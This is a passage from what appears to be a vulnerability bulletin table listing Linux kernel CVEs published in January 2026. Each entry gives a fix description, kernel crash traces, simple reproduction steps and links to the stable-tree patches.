ip_finish_output2+0x7d5/0xb00 __ip_queue_xmit+0xe24/0x1ab0 __tcp_transmit_skb+0x1bcb/0x3340 tcp_write_xmit+0x175d/0x6bd0 __tcp_push_pending_frames+0x7b/0x280 tcp_sendmsg_locked+0x2e4f/0x32d0 tcp_sendmsg+0x24/0x40 sock_write_iter+0x322/0x430 vfs_write+0x56c/0xa60 ksys_write+0xd1/0x190 do_syscall_64+0x43/0x90 entry_SYSCALL_64_after_hwframe+0x44/0xae RIP: 0033:0x7f511b476b10 Code: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24 RSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001 RAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10 RDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003 RBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00 R10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000 R13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003 </TASK> Allocated by task 1: __kasan_krealloc+0x131/0x1c0 krealloc+0x90/0xc0 add_sysfs_param+0xcb/0x8a0 kernel_add_sysfs_param+0x81/0xd4 param_sysfs_builtin+0x138/0x1a6 param_sysfs_init+0x57/0x5b do_one_initcall+0x104/0x250 do_initcall_level+0x102/0x132 do_initcalls+0x46/0x74 kernel_init_freeable+0x28f/0x393 kernel_init+0x14/0x1a0 ret_from_fork+0x22/0x30 The buggy address belongs to the object at ffff888014114000 which belongs to the cache kmalloc-2k of size 2048 The buggy address is located 1620 bytes to the right of 2048-byte region [ffff888014114000, ffff888014114800] The buggy address belongs to the physical page: page:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110 head:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0 flags: 0x100000000010200(slab|head|node=0|zone=1) raw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000 raw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected ================================================================== This happens because the TBI check unconditionally dereferences the last byte without validating the reported length first: u8 last_byte = *(data + length - 1); Fix by rejecting the frame early if the length is zero, or if it exceeds adapter->rx_buffer_len. This preserves the TBI workaround semantics for valid frames and prevents touching memory beyond the RX buffer. | 2026-01-13 | not yet calculated | CVE-2025-71093 | https://git.kernel.org/stable/c/4ccfa56f272241e8d8e2c38191fdbb03df489d80 https://git.kernel.org/stable/c/278b7cfe0d4da7502c7fd679b15032f014c92892 https://git.kernel.org/stable/c/ad7a2a45e2417ac54089926b520924f8f0d91aea https://git.kernel.org/stable/c/2c4c0c09f9648ba766d399917d420d03e7b3e1f8 https://git.kernel.org/stable/c/26c8bebc2f25288c2bcac7bc0a7662279a0e817c https://git.kernel.org/stable/c/ee7c125fb3e8b04dd46510130b9fc92380e5d578 https://git.kernel.org/stable/c/9c72a5182ed92904d01057f208c390a303f00a0f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: usb: asix: validate PHY address before use The ASIX driver reads the PHY address from the USB device via asix_read_phy_addr(). A malicious or faulty device can return an invalid address (>= PHY_MAX_ADDR), which causes a warning in mdiobus_get_phy(): addr 207 out of range WARNING: drivers/net/phy/mdio_bus.c:76 Validate the PHY address in asix_read_phy_addr() and remove the now-redundant check in ax88172a.c. | 2026-01-13 | not yet calculated | CVE-2025-71094 | https://git.kernel.org/stable/c/fc96018f09f8d30586ca6582c5045a84eafef146 https://git.kernel.org/stable/c/f5f4f30f3811d37e1aa48667c36add74e5a8d99f https://git.kernel.org/stable/c/38722e69ee64dbb020028c93898d25d6f4c0e0b2 https://git.kernel.org/stable/c/98a12c2547a44a5f03f35c108d2022cc652cbc4d https://git.kernel.org/stable/c/bf8a0f3b787ca7c5889bfca12c60c483041fbee3 https://git.kernel.org/stable/c/a1e077a3f76eea0dc671ed6792e7d543946227e8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: stmmac: fix the crash issue for zero copy XDP_TX action There is a crash issue when running zero copy XDP_TX action, the crash log is shown below. [ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000 [ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP [ 216.301694] Call trace: [ 216.304130] dcache_clean_poc+0x20/0x38 (P) [ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0 [ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400 [ 216.317701] __stmmac_xdp_run_prog+0x164/0x368 [ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00 [ 216.326576] __napi_poll+0x40/0x218 [ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt For XDP_TX action, the xdp_buff is converted to xdp_frame by xdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame depends on the memory type of the xdp_buff. For page pool based xdp_buff it produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy XSK pool based xdp_buff it produces xdp_frame with memory type MEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the memory type and always uses the page pool type, this leads to invalid mappings and causes the crash. Therefore, check the xdp_buff memory type in stmmac_xdp_xmit_back() to fix this issue. | 2026-01-13 | not yet calculated | CVE-2025-71095 | https://git.kernel.org/stable/c/3f7823219407f2f18044c2b72366a48810c5c821 https://git.kernel.org/stable/c/4d0ceb7677e1c4616afb96abb4518f70b65abb0d https://git.kernel.org/stable/c/45ee0462b88396a0bd1df1991f801c89994ea72b https://git.kernel.org/stable/c/5e5988736a95b1de7f91b10ac2575454b70e4897 https://git.kernel.org/stable/c/a48e232210009be50591fdea8ba7c07b0f566a13 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly The netlink response for RDMA_NL_LS_OP_IP_RESOLVE should always have a LS_NLA_TYPE_DGID attribute, it is invalid if it does not. Use the nl parsing logic properly and call nla_parse_deprecated() to fill the nlattrs array and then directly index that array to get the data for the DGID. Just fail if it is NULL. Remove the for loop searching for the nla, and squash the validation and parsing into one function. Fixes an uninitialized read from the stack triggered by userspace if it does not provide the DGID to a kernel initiated RDMA_NL_LS_OP_IP_RESOLVE query. BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline] BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490 hex_byte_pack include/linux/hex.h:13 [inline] ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490 ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509 ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633 pointer+0xc09/0x1bd0 lib/vsprintf.c:2542 vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930 vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279 vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426 vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465 vprintk+0x36/0x50 kernel/printk/printk_safe.c:82 _printk+0x17e/0x1b0 kernel/printk/printk.c:2475 ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline] ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141 rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline] rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline] rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259 netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline] netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346 netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896 sock_sendmsg_nosec net/socket.c:714 [inline] __sock_sendmsg+0x333/0x3d0 net/socket.c:729 ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617 ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671 __sys_sendmsg+0x1aa/0x300 net/socket.c:2703 __compat_sys_sendmsg net/compat.c:346 [inline] __do_compat_sys_sendmsg net/compat.c:353 [inline] __se_compat_sys_sendmsg net/compat.c:350 [inline] __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350 ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371 do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline] __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306 do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331 do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:3 | 2026-01-13 | not yet calculated | CVE-2025-71096 | https://git.kernel.org/stable/c/376f46c8983458ead26cac83aa897a0b78491831 https://git.kernel.org/stable/c/bfe10318fc23e0b3f1d0a18dad387d29473a624d https://git.kernel.org/stable/c/45532638de5da24c201aa2a9b3dd4b054064de7b https://git.kernel.org/stable/c/9d85524789c2f17c0e87de8d596bcccc3683a1fc https://git.kernel.org/stable/c/acadd4097d25d6bd472bcb3f9f3eba2b5105d1ec https://git.kernel.org/stable/c/0b948afc1ded88b3562c893114387f34389eeb94 https://git.kernel.org/stable/c/a7b8e876e0ef0232b8076972c57ce9a7286b47ca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv4: Fix reference count leak when using error routes with nexthop objects When a nexthop object is deleted, it is marked as dead and then fib_table_flush() is called to flush all the routes that are using the dead nexthop. The current logic in fib_table_flush() is to only flush error routes (e.g., blackhole) when it is called as part of network namespace dismantle (i.e., with flush_all=true). Therefore, error routes are not flushed when their nexthop object is deleted: # ip link add name dummy1 up type dummy # ip nexthop add id 1 dev dummy1 # ip route add 198.51.100.1/32 nhid 1 # ip route add blackhole 198.51.100.2/32 nhid 1 # ip nexthop del id 1 # ip route show blackhole 198.51.100.2 nhid 1 dev dummy1 As such, they keep holding a reference on the nexthop object which in turn holds a reference on the nexthop device, resulting in a reference count leak: # ip link del dev dummy1 [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2 Fix by flushing error routes when their nexthop is marked as dead. IPv6 does not suffer from this problem. | 2026-01-13 | not yet calculated | CVE-2025-71097 | https://git.kernel.org/stable/c/5de7ad7e18356e39e8fbf7edd185a5faaf4f385a https://git.kernel.org/stable/c/33ff5c207c873215e54e6176624ed57423cb7dea https://git.kernel.org/stable/c/30386e090c49e803c0616a7147e43409c32a2b0e https://git.kernel.org/stable/c/5979338c83012110ccd45cae6517591770bfe536 https://git.kernel.org/stable/c/ee4183501ea556dca31f5ffd8690aa9fd25b609f https://git.kernel.org/stable/c/e3fc381320d04e4a74311e576a86cac49a16fc43 https://git.kernel.org/stable/c/ac782f4e3bfcde145b8a7f8af31d9422d94d172a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ip6_gre: make ip6gre_header() robust Over the years, syzbot found many ways to crash the kernel in ip6gre_header() [1]. This involves the team or bonding drivers' ability to dynamically change their dev->needed_headroom and/or dev->hard_header_len. In this particular crash mld_newpack() allocated an skb with a too small reserve/headroom, and by the time mld_sendpack() was called, syzbot managed to attach an ip6gre device. [1] skbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0 ------------[ cut here ]------------ kernel BUG at net/core/skbuff.c:213 ! <TASK> skb_under_panic net/core/skbuff.c:223 [inline] skb_push+0xc3/0xe0 net/core/skbuff.c:2641 ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371 dev_hard_header include/linux/netdevice.h:3436 [inline] neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618 neigh_output include/net/neighbour.h:556 [inline] ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136 __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline] ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220 NF_HOOK_COND include/linux/netfilter.h:307 [inline] ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247 NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318 mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855 mld_send_cr net/ipv6/mcast.c:2154 [inline] mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693 | 2026-01-13 | not yet calculated | CVE-2025-71098 | https://git.kernel.org/stable/c/17e7386234f740f3e7d5e58a47b5847ea34c3bc2 https://git.kernel.org/stable/c/41a1a3140aff295dee8063906f70a514548105e8 https://git.kernel.org/stable/c/adee129db814474f2f81207bd182bf343832a52e https://git.kernel.org/stable/c/1717357007db150c2d703f13f5695460e960f26c https://git.kernel.org/stable/c/5fe210533e3459197eabfdbf97327dacbdc04d60 https://git.kernel.org/stable/c/91a2b25be07ce1a7549ceebbe82017551d2eec92 https://git.kernel.org/stable/c/db5b4e39c4e63700c68a7e65fc4e1f1375273476 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl() In xe_oa_add_config_ioctl(), we accessed oa_config->id after dropping metrics_lock. Since this lock protects the lifetime of oa_config, an attacker could guess the id and call xe_oa_remove_config_ioctl() with perfect timing, freeing oa_config before we dereference it, leading to a potential use-after-free. Fix this by caching the id in a local variable while holding the lock. v2: (Matt A) - Dropped mutex_unlock(&oa->metrics_lock) ordering change from xe_oa_remove_config_ioctl() (cherry picked from commit 28aeaed130e8e587fd1b73b6d66ca41ccc5a1a31) | 2026-01-13 | not yet calculated | CVE-2025-71099 | https://git.kernel.org/stable/c/c6d30b65b7a44dac52ad49513268adbf19eab4a2 https://git.kernel.org/stable/c/7cdb9a9da935c687563cc682155461fef5f9b48d https://git.kernel.org/stable/c/dcb171931954c51a1a7250d558f02b8f36570783 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc() The TID obtained from ieee80211_get_tid() might be out of range of the array size of sta_entry->tids[], so check that the TID is less than MAX_TID_COUNT. Otherwise, UBSAN warns: UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30 index 10 is out of range for type 'rtl_tid_data [9]' | 2026-01-13 | not yet calculated | CVE-2025-71100 | https://git.kernel.org/stable/c/9765d6eb8298b07d499cdf9ef7c237d3540102d6 https://git.kernel.org/stable/c/90a15ff324645aa806d81fa349497cd964861b66 https://git.kernel.org/stable/c/dd39edb445f07400e748da967a07d5dca5c5f96e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing The hp_populate_*_elements_from_package() functions in the hp-bioscfg driver contain out-of-bounds array access vulnerabilities. These functions parse ACPI packages into internal data structures using a for loop with index variable 'elem' that iterates through enum_obj/integer_obj/order_obj/password_obj/string_obj arrays. When processing multi-element fields like PREREQUISITES and ENUM_POSSIBLE_VALUES, these functions read multiple consecutive array elements using expressions like 'enum_obj[elem + reqs]' and 'enum_obj[elem + pos_values]' within nested loops. The bug is that the bounds check only validated elem, but did not consider the additional offset when accessing elem + reqs or elem + pos_values. The fix changes the bounds check to validate the actual accessed index. | 2026-01-13 | not yet calculated | CVE-2025-71101 | https://git.kernel.org/stable/c/cf7ae870560b988247a4bbbe5399edd326632680 https://git.kernel.org/stable/c/db4c26adf7117b1a4431d1197ae7109fee3230ad https://git.kernel.org/stable/c/79cab730dbaaac03b946c7f5681bd08c986e2abd https://git.kernel.org/stable/c/e44c42c830b7ab36e3a3a86321c619f24def5206 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scs: fix a wrong parameter in __scs_magic __scs_magic() needs a 'void *' variable, but a 'struct task_struct *' is given. 'task_scs(tsk)' is the starting address of the task's shadow call stack, and '__scs_magic(task_scs(tsk))' is the end address of the task's shadow call stack. Here it should be '__scs_magic(task_scs(tsk))'. The user-visible effect of this bug is that when CONFIG_DEBUG_STACK_USAGE is enabled, the shadow call stack usage checking function (scs_check_usage) would scan an incorrect memory range. This could lead to: 1. **Inaccurate stack usage reporting**: The function would calculate wrong usage statistics for the shadow call stack, potentially showing incorrect values in kmsg. 2. **Potential kernel crash**: If the value of __scs_magic(tsk) is greater than that of __scs_magic(task_scs(tsk)), the for loop may access unmapped memory, potentially causing a kernel panic. However, this scenario is unlikely because task_struct is allocated via the slab allocator (which typically returns lower addresses), while the shadow call stack returned by task_scs(tsk) is allocated via vmalloc (which typically returns higher addresses). However, since this is purely a debugging feature (CONFIG_DEBUG_STACK_USAGE), normal production systems should be unaffected. The bug only impacts developers and testers who are actively debugging stack usage with this configuration enabled. | 2026-01-14 | not yet calculated | CVE-2025-71102 | https://git.kernel.org/stable/c/1727e8bd69103a68963a5613a0ddb6d8d37df5d3 https://git.kernel.org/stable/c/cfdf6250b63b953b1d8e60814c8ca96c6f9d1c8c https://git.kernel.org/stable/c/57ba40b001be27786d0570dd292289df748b306b https://git.kernel.org/stable/c/062774439d442882b44f5eab8c256ad3423ef284 https://git.kernel.org/stable/c/9ef28943471a16e4f9646bc3e8e2de148e7d8d7b https://git.kernel.org/stable/c/a19fb3611e4c06624fc0f83ef19f4fb8d57d4751 https://git.kernel.org/stable/c/08bd4c46d5e63b78e77f2605283874bbe868ab19 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm: adreno: fix dereferencing ifpc_reglist when not declared On platforms with an a7xx GPU not supporting IFPC, the ifpc_reglist is still dereferenced in a7xx_patch_pwrup_reglist(), which causes a kernel crash: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000008 ... pc : a6xx_hw_init+0x155c/0x1e4c [msm] lr : a6xx_hw_init+0x9a8/0x1e4c [msm] ... Call trace: a6xx_hw_init+0x155c/0x1e4c [msm] (P) msm_gpu_hw_init+0x58/0x88 [msm] adreno_load_gpu+0x94/0x1fc [msm] msm_open+0xe4/0xf4 [msm] drm_file_alloc+0x1a0/0x2e4 [drm] drm_client_init+0x7c/0x104 [drm] drm_fbdev_client_setup+0x94/0xcf0 [drm_client_lib] drm_client_setup+0xb4/0xd8 [drm_client_lib] msm_drm_kms_post_init+0x2c/0x3c [msm] msm_drm_init+0x1a4/0x228 [msm] msm_drm_bind+0x30/0x3c [msm] ... Check the validity of ifpc_reglist before dereferencing the table to set up the register values. Patchwork: https://patchwork.freedesktop.org/patch/688944/ | 2026-01-14 | not yet calculated | CVE-2025-71103 | https://git.kernel.org/stable/c/19648135e904bce447d368ecb6136e5da809639c https://git.kernel.org/stable/c/129049d4fe22c998ae9fd1ec479fbb4ed5338c15 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Fix VM hard lockup after prolonged inactivity with periodic HV timer When advancing the target expiration for the guest's APIC timer in periodic mode, set the expiration to "now" if the target expiration is in the past (similar to what is done in update_target_expiration()). Blindly adding the period to the previous target expiration can result in KVM generating a practically unbounded number of hrtimer IRQs due to programming an expired timer over and over. In extreme scenarios, e.g. if userspace pauses/suspends a VM for an extended duration, this can even cause hard lockups in the host. Currently, the bug only affects Intel CPUs when using the hypervisor timer (HV timer), a.k.a. the VMX preemption timer. Unlike the software timer, a.k.a. hrtimer, which KVM keeps running even on exits to userspace, the HV timer only runs while the guest is active. As a result, if the vCPU does not run for an extended duration, there will be a huge gap between the target expiration and the current time the vCPU resumes running. Because the target expiration is incremented by only one period on each timer expiration, this leads to a series of timer expirations occurring rapidly after the vCPU/VM resumes. More critically, when the vCPU first triggers a periodic HV timer expiration after resuming, advancing the expiration by only one period will result in a target expiration in the past. As a result, the delta may be calculated as a negative value. When the delta is converted into an absolute value (tscdeadline is an unsigned u64), the resulting value can overflow what the HV timer is capable of programming. I.e. the large value will exceed the VMX Preemption Timer's maximum bit width of cpu_preemption_timer_multi + 32, and thus cause KVM to switch from the HV timer to the software timer (hrtimers). After switching to the software timer, periodic timer expiration callbacks may be executed consecutively within a single clock interrupt handler, because hrtimers honors KVM's request for an expiration in the past and immediately re-invokes KVM's callback after reprogramming. And because the interrupt handler runs with IRQs disabled, restarting KVM's hrtimer over and over until the target expiration is advanced to "now" can result in a hard lockup. E.g. the following hard lockup was triggered in the host when running a Windows VM (only relevant because it used the APIC timer in periodic mode) after resuming the VM from a long suspend (in the host). NMI watchdog: Watchdog detected hard LOCKUP on cpu 45 ... RIP: 0010:advance_periodic_target_expiration+0x4d/0x80 [kvm] ... RSP: 0018:ff4f88f5d98d8ef0 EFLAGS: 00000046 RAX: fff0103f91be678e RBX: fff0103f91be678e RCX: 00843a7d9e127bcc RDX: 0000000000000002 RSI: 0052ca4003697505 RDI: ff440d5bfbdbd500 RBP: ff440d5956f99200 R08: ff2ff2a42deb6a84 R09: 000000000002a6c0 R10: 0122d794016332b3 R11: 0000000000000000 R12: ff440db1af39cfc0 R13: ff440db1af39cfc0 R14: ffffffffc0d4a560 R15: ff440db1af39d0f8 FS: 00007f04a6ffd700(0000) GS:ff440db1af380000(0000) knlGS:000000e38a3b8000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000d5651feff8 CR3: 000000684e038002 CR4: 0000000000773ee0 PKRU: 55555554 Call Trace: <IRQ> apic_timer_fn+0x31/0x50 [kvm] __hrtimer_run_queues+0x100/0x280 hrtimer_interrupt+0x100/0x210 ? ttwu_do_wakeup+0x19/0x160 smp_apic_timer_interrupt+0x6a/0x130 apic_timer_interrupt+0xf/0x20 </IRQ> Moreover, if the suspend duration of the virtual machine is not long enough to trigger a hard lockup in this scenario, since commit 98c25ead5eda ("KVM: VMX: Move preemption timer <=> hrtimer dance to common x86"), KVM will continue using the software timer until the guest reprograms the APIC timer in some way. Since the periodic timer does not require frequent APIC timer register programming, the guest may continue to use the software timer in ---truncated--- | 2026-01-14 | not yet calculated | CVE-2025-71104 | https://git.kernel.org/stable/c/786ed625c125c5cd180d6aaa37e653e3e4ffb8d9 https://git.kernel.org/stable/c/d2da0df7bbc4fb4fd7d0a1da704f81a09c72fe73 https://git.kernel.org/stable/c/807dbe8f3862fa7c164155857550ce94b36a11b9 https://git.kernel.org/stable/c/7b54ccef865e0aa62e4871d4ada2ba4b9dcb8bed https://git.kernel.org/stable/c/e746e51947053a02af2ea964593dc4887108d379 https://git.kernel.org/stable/c/e23f46f1a971c73dad2fd63e1408696114ddebe2 https://git.kernel.org/stable/c/18ab3fc8e880791aa9f7c000261320fc812b5465 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: use global inline_xattr_slab instead of per-sb slab cache As Hong Yun reported in mailing list: loop7: detected capacity change from 0 to 131072 ------------[ cut here ]------------ kmem_cache of name 'f2fs_xattr_entry-7:7' already exists WARNING: CPU: 0 PID: 24426 at mm/slab_common.c:110 kmem_cache_sanity_check mm/slab_common.c:109 [inline] WARNING: CPU: 0 PID: 24426 at mm/slab_common.c:110 __kmem_cache_create_args+0xa6/0x320 mm/slab_common.c:307 CPU: 0 UID: 0 PID: 24426 Comm: syz.7.1370 Not tainted 6.17.0-rc4 #1 PREEMPT(full) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014 RIP: 0010:kmem_cache_sanity_check mm/slab_common.c:109 [inline] RIP: 0010:__kmem_cache_create_args+0xa6/0x320 mm/slab_common.c:307 Call Trace: __kmem_cache_create include/linux/slab.h:353 [inline] f2fs_kmem_cache_create fs/f2fs/f2fs.h:2943 [inline] f2fs_init_xattr_caches+0xa5/0xe0 fs/f2fs/xattr.c:843 f2fs_fill_super+0x1645/0x2620 fs/f2fs/super.c:4918 get_tree_bdev_flags+0x1fb/0x260 fs/super.c:1692 vfs_get_tree+0x43/0x140 fs/super.c:1815 do_new_mount+0x201/0x550 fs/namespace.c:3808 do_mount fs/namespace.c:4136 [inline] __do_sys_mount fs/namespace.c:4347 [inline] __se_sys_mount+0x298/0x2f0 fs/namespace.c:4324 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0x8e/0x3a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x76/0x7e The bug can be reproduced w/ below scripts: - mount /dev/vdb /mnt1 - mount /dev/vdc /mnt2 - umount /mnt1 - mounnt /dev/vdb /mnt1 The reason is that if we create two slab caches, named f2fs_xattr_entry-7:3 and f2fs_xattr_entry-7:7, and they have the same slab size, the slab system will actually only create one slab cache core structure, which has the slab name "f2fs_xattr_entry-7:3", and the two slab caches share the same structure and cache address. So, if we destroy the f2fs_xattr_entry-7:3 cache w/ its cache address, it will decrease the reference count of the slab cache rather than release the slab cache entirely, since one more user still references the cache. Then, if we try to create a slab cache w/ the name "f2fs_xattr_entry-7:3" again, the slab system will find that there is an existing cache with the same name and trigger the warning. Let's change to use a global inline_xattr_slab instead of a per-sb slab cache to fix this. | 2026-01-14 | not yet calculated | CVE-2025-71105 | https://git.kernel.org/stable/c/93d30fe19660dec6bf1bd3d5c186c1c737b21aa5 https://git.kernel.org/stable/c/474cc3ed37436ddfd63cac8dbffe3b1e219e9100 https://git.kernel.org/stable/c/72ce19dfed162da6e430467333b2da70471d08a4 https://git.kernel.org/stable/c/be4c3a3c6c2304a8fcd14095d18d26f0cc4e222a https://git.kernel.org/stable/c/1eb0b130196bcbc56c5c80c83139fa70c0aa82c5 https://git.kernel.org/stable/c/e6d828eae00ec192e18c2ddaa2fd32050a96048a https://git.kernel.org/stable/c/1f27ef42bb0b7c0740c5616ec577ec188b8a1d05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs: PM: Fix reverse check in filesystems_freeze_callback() The freeze_all_ptr check in filesystems_freeze_callback() introduced by commit a3f8f8662771 ("power: always freeze efivarfs") is reverse which quite confusingly causes all file systems to be frozen when filesystem_freeze_enabled is false. On my systems it causes the WARN_ON_ONCE() in __set_task_frozen() to trigger, most likely due to an attempt to freeze a file system that is not ready for that. Add a logical negation to the check in question to reverse it as appropriate. | 2026-01-14 | not yet calculated | CVE-2025-71106 | https://git.kernel.org/stable/c/b107196729ff6b9d6cde0a71f49c1243def43328 https://git.kernel.org/stable/c/222047f68e8565c558728f792f6fef152a1d4d51 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: ensure node page reads complete before f2fs_put_super() finishes Xfstests generic/335, generic/336 sometimes crash with the following message: F2FS-fs (dm-0): detect filesystem reference count leak during umount, type: 9, count: 1 ------------[ cut here ]------------ kernel BUG at fs/f2fs/super.c:1939! Oops: invalid opcode: 0000 [#1] SMP NOPTI CPU: 1 UID: 0 PID: 609351 Comm: umount Tainted: G W 6.17.0-rc5-xfstests-g9dd1835ecda5 #1 PREEMPT(none) Tainted: [W]=WARN Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 RIP: 0010:f2fs_put_super+0x3b3/0x3c0 Call Trace: <TASK> generic_shutdown_super+0x7e/0x190 kill_block_super+0x1a/0x40 kill_f2fs_super+0x9d/0x190 deactivate_locked_super+0x30/0xb0 cleanup_mnt+0xba/0x150 task_work_run+0x5c/0xa0 exit_to_user_mode_loop+0xb7/0xc0 do_syscall_64+0x1ae/0x1c0 entry_SYSCALL_64_after_hwframe+0x76/0x7e </TASK> ---[ end trace 0000000000000000 ]--- It appears that sometimes it is possible that f2fs_put_super() is called before all node page reads are completed. Adding a call to f2fs_wait_on_all_pages() for F2FS_RD_NODE fixes the problem. | 2026-01-14 | not yet calculated | CVE-2025-71107 | https://git.kernel.org/stable/c/c3031cf2b61f1508662fc95ef9ad505cb0882a5f https://git.kernel.org/stable/c/3b15d5f12935e9e25f9a571e680716bc9ee61025 https://git.kernel.org/stable/c/0b36fae23621a09e772c8adf918b9011158f8511 https://git.kernel.org/stable/c/297baa4aa263ff8f5b3d246ee16a660d76aa82c4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: typec: ucsi: Handle incorrect num_connectors capability The UCSI spec states that the num_connectors field is 7 bits, and the 8th bit is reserved and should be set to zero. Some buggy FW has been known to set this bit, and it can lead to a system not booting. Flag that the FW is not behaving correctly, and auto-fix the value so that the system boots correctly. Found on Lenovo P1 G8 during Linux enablement program. The FW will be fixed, but seemed worth addressing in case it hit platforms that aren't officially Linux supported. | 2026-01-14 | not yet calculated | CVE-2025-71108 | https://git.kernel.org/stable/c/07c8d2a109d847775b3b4e2c3294c8e1eea75432 https://git.kernel.org/stable/c/58941bbb0050e365a98c64f1fc4a9a0ac127dba6 https://git.kernel.org/stable/c/f72f97d0aee4a993a35f2496bca5efd24827235d https://git.kernel.org/stable/c/914605b0de8128434eafc9582445306830748b93 https://git.kernel.org/stable/c/3042a57a8e8bce4a3100c3f6f03dc372aab24943 https://git.kernel.org/stable/c/132fe187e0d940f388f839fe2cde9b84106ad20d https://git.kernel.org/stable/c/30cd2cb1abf4c4acdb1ddb468c946f68939819fb |
